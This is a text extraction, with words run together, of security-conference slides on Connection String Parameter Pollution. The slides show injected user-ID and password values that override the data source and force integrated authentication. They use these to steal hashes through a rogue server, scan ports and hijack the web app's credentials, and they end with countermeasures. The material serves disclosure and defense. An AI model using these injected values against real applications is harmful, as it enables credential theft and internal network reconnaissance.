Top Banner
Connec&on Strings Define the way an applica&on connects to a data repository There are connec&on strings for: Rela&onal Databases (MSSQL, Oracle, MySQL,…) LDAP Directories Files (XML, plain, csv, xls, mdb, …) Etc…
42

Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Jul 29, 2020

Download

Documents

dariahiddleston
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Connec&onStrings

•  Definethewayanapplica&onconnectstoadatarepository

•  Thereareconnec&onstringsfor:– Rela&onalDatabases(MSSQL,Oracle,MySQL,…)– LDAPDirectories– Files(XML,plain,csv,xls,mdb,…)– Etc…

Page 2: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

DatabasesConnec&onStrings

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;UserId=myUsername;

Password=myPassword;

Page 3: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

DBConnec&onbuildup

Page 4: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

GoogleHacking

Page 5: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

GoogleHacking

Page 6: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

UDL(UniversalDataLinks)Files

Page 7: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

HowWebappconnectstoDB

Opera&ngSystemAccounts

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;UserId=;

Password=;IntegratedSecurity=SSPI/

True/Yes;

DatabaseCreden&als

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;UserId=myUsername;

Password=myPassword;IntegratedSecurity=No;

Page 8: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Syslogins

Customuserstable

Connec&onstring

1.‐Webapplicatonconnectsusingitscreden&alstothedatabase.

2.‐Asksuserlogininforma&on.

3.‐Checkslogininforma&onaboutinfostoredincustomuserstable.

Selectidfromusers

Webapplica&onmanagestheloginprocess

Usersauthen&catedbyWebApp

DatabaseEngine ApprunningonWebServer

Page 9: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Syslogins Connec&onstring

1.‐Webapplica&onasksforcreden&als.

2.‐Aconnec&onstringiscomposedwiththecreden&alstoconnecttothedatabase.

3.‐Rolesandpermitsarelimitedbytheuserusedintheconnec&onstring

Databaseenginemanagestheloginprocess

Usersauthe&catedbyDatabase

DatabaseEngine ApprunningonWebServer

Page 10: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Connec&onStringA^acks

•  It´spossibletoinjectparametersintoconnec&onstringsusingsemicolonsasaseparator

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;

IntegratedSecurity=NO;

UserId=myUsername;

Password=myPassword;Encryp2on=Off;

Page 11: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Connec&onStringBuilder

•  Availablein.NETFramework2.0

•  Buildsecureconnec&onstringsusingparameters•  It´snotpossibletoinjectintotheconnec&onstring

Page 12: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Arepeopleawareofthis?

Page 13: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Connec&onStringParameterPollu&on

•  Thegoalistoinjectparametersintheconnec&onstring,whethertheyexistornot

•  Hadduplicatedaparameter,thelastvaluewins

•  Thisbehaviorallowsa^ackerstooverwritecompletelytheconnec&onstring,thereforetomanipulatethewaytheapplica&onwillworkandhowshouldbetheitauthen&cated

Page 14: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

DBConnec&onObject

Pollu&onableBehavior

Param1

Param2

Param1=ValueA Param2=ValueB Param1=ValueC Param2=ValueD

Page 15: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

WhatcanbedonewithCSPP?Overwriteaparameter

DBConnec&onObjectDataSource

UID

DataSource=DB1 UID=sa DataSource=DB2

password

password=Pwnd!

Page 16: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

ScanningtheDMZ

DevelopmentDatabase1

FinnacialDatabase

TestDatabase

ForgoGenDatabase

FW

WebappvulnerabletoCSPP

Internet Produc&onDatabase

DataSource

Page 17: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

PortScanningaServer

FW

WebappvulnerabletoCSPP

Internet Produc&onDatabaseServer

DB1,80DB1,21DB1,25

DB1,1445

DataSource

Page 18: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

WhatcanbedonewithCSPP?Addaparameter

DBConnec&onObjectDataSource

UID

DataSource=DB1 UID=sa IntegratedSecurity=True

password

password=Pwnd!

Page 19: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack1:Hashstealing

1.‐RunaRogueServeronanaccessibleIPaddress:

Rogue_Server

2.‐Ac&vateasniffertocatchtheloginprocess

Cain/Wireshark

3.‐OverwriteDataSourceparameter

Data_Source=Rogue_Server

4.‐ForceWindowsIntegratedAuthen&ca&on

IntegratedSecurity=true

Page 20: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack1:Hashstealing

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Rogue_Server;

Password=;IntegratedSecurity=True;

Page 21: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSSP1:ASP.NETEnterpriseManager

Page 22: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack2:PortScanning

1.‐DuplicatetheDataSourceparametersehngtheTargetserverandtargetporttobescanned. Data_Source=Target_Server,target_Port

2.‐Checktheerrormessages:

‐NoTCPConnec&on‐>Portisclosed

‐NoSQLServer‐>Portisopen

‐InvalidPassword‐>SQLServerthere!

Page 23: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack2:PortScanning

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Target_Server,Target_Port;

Password=;IntegratedSecurity=True;

Page 24: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPP2:myLi^leAdmin

PortisOpen

Page 25: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPP2:myLi^leAdmin

PortisClosed

Page 26: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack3:HijackingWebCreden&als

1.‐DuplicateDataSourceparametertothetargetSQLServer

Data_Source=Target_Server

2.‐ForceWindowsAuthen&ca&on

IntegratedSecurity=true

3.‐Applica&onpoolinwhichthewebappisrunningonwillsenditscreden&alsinordertologintothedatabaseengine.

Page 27: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack3:HijackingWebCreden&als

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Target_Server;

Password=;IntegratedSecurity=true;

Page 28: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack3:WebDataAdministrator

Page 29: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack3:myLi^leAdmin/myLi^leBackup

Page 30: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPA^ack3:ASP.NETEnterpriseManager

Page 31: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

OtherDatabases

•  MySQL–  DoesnotsupportIntegratedsecurity–  It´spossibletomanipulatethebehaviorofthewebapplica&on,

although•  PortScanning•  Connecttointernal/tes&ng/fordevelopingDatabases•  Stealcreden&als

•  OraclesupportsintegratedauthorityrunningonWindowsandUNIX/Linuxservers–  It´spossibletoperformalldescribeda^acks

•  Hashstealing•  PortScanning•  HijackingWebcreden&als

–  Alsoit´spossibletoelevateaconnec&ontosysdbainordertoshutdown/startupaninstance

Page 32: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

DemoDemo

Page 33: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Scanner

•  Proofofconcepttotestyournetwork•  Tryahijackingwebcreden&alsa^ack• Wri^eninASP.NETC#

•  Freedownload(codeincludeofcourse)h^p://www.informa&ca64.com/csppScanner.aspx

Page 34: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

CSPPScanner

Page 35: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

ScannerCSPP:A^acks

Page 36: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

DemoDemo

Page 37: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

myLi^leAdmin/myLi^leBackup

myLi^leToolsreleasedasecuryadvisoryandapatchaboutthis

Page 38: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

ASP.NETEnterpriseManager

•  ASP.NETEnterpriseManageris“abandoned”,butit´ss&llbeenusedinalotofwebControlPanels.

•  Fixthecodeyourself

Page 39: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

ASP.NETEnterpriseManager•  ASP.NETEnterpriseManageris“abandoned”,butit´ss&llbeenusedinalotofwebControlPanels.

•  Fixthecodeyourself

Page 40: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

ASP.NETWebDataAdmistrator

ASPWebDataAdministratorissecureinCodePlexwebsite,butnotinMicrosoowebsitewhereanunsecureoldversioniswaspublished

Page 41: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Countermeasures

•  Hardenyourfirewall– Outboundconnec&ons

•  Reviewyourinternalaccountspolicy– Webapplica&on– Webserver– DatabaseEngine

•  UseConnec5onStringBuilder

•  Filterthe;)

Page 42: Parameter Pollution in Connection Strings Attack€¦ · • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web applicaon, although

Ques&ons?

ContactoChemaAlonsochema@informa&ca64.comh^p://www.informa&ca64.comh^p://elladodelmal.blogspot.comh^p://twi^er.com/chemaalonso

AuthorsChemaAlonsoManuelFernández“TheSur”AlejandroMarsnBailónAntonioGuzmán


Related Documents
Apache*Camel€¦ · SpringYDM(OSGi)*Applicaon 64 >

Apache*Camel€¦ · SpringYDM(OSGi)*Applicaon 64 >

Category: Documents
manipulate 2011 poster - Jerk

manipulate 2011 poster - Jerk

Category: Documents
1 Chapter 9 Characters and Strings. Objectives Declare and manipulate data of the char data type. Write string processing program using String, StringBuilder,

1 Chapter 9 Characters and Strings. Objectives Declare and.....

Category: Documents
SAS Manipulate Datasets

SAS Manipulate Datasets

Category: Documents
Topic&5&–Transport Transportservices&and&protocols& · Topic5& 2 6 applicaon& transport network& link& physical& P1 applicaon& transport network& link& physical& applicaon& transport

Topic&5&–Transport Transportservices&and&protocols& ·...

Category: Documents
Manipulating Strings. 2 Topics Manipulate strings Manipulate strings Parse strings Parse strings Compare strings Compare strings Handle form submissions.

Manipulating Strings. 2 Topics Manipulate strings Manipulate...

Category: Documents
Seismic Laboratory for Applicaon*of*aconvex*phase ... · Applicaon*of*aconvex*phase*retrieval*method*to*blind* seismic deconvoluon * 0 200 400 600 800 1000 −0.15 −0.1 −0.05

Seismic Laboratory for Applicaon*of*aconvex*phase ... ·...

Category: Documents
Bob$Sachdev$ C.E.O. PSPSolu3ons...OurTeamConsistsOf!Professional$Web$Designers$!Open$Source$CMS$Developers$$!Web$Applicaon$Developers$!Mobile$Applicaon$Developers$!Online$Marke3ng$Specialists$

Bob$Sachdev$ C.E.O....

Category: Documents
WRF/DART(–Applicaon( examples(

WRF/DART(–Applicaon( examples(

Category: Documents
Database Programming with SQL · Regular Expressions 11 Regular Expression Functions • Oracle provides a set of SQL functions that you can use to search and manipulate strings using

Database Programming with SQL · Regular Expressions 11...

Category: Documents
(WhenandHow)DoVotersTryto Manipulate? - KIT file(WhenandHow)DoVotersTryto Manipulate? ExperimentalEvidencefromBordaElectionsy SebastianKube⁄,ClemensPuppe⁄⁄ Abstract ...

(WhenandHow)DoVotersTryto Manipulate? - KIT...

Category: Documents
CSE 2221 - Stackweb.cse.ohio-state.edu/software/2221/web-sw1/extras/slides/32.Stack.pdfStack • The . Stack. component family allows you to manipulate strings of entries of any (arbitrary)

CSE 2221 -...

Category: Documents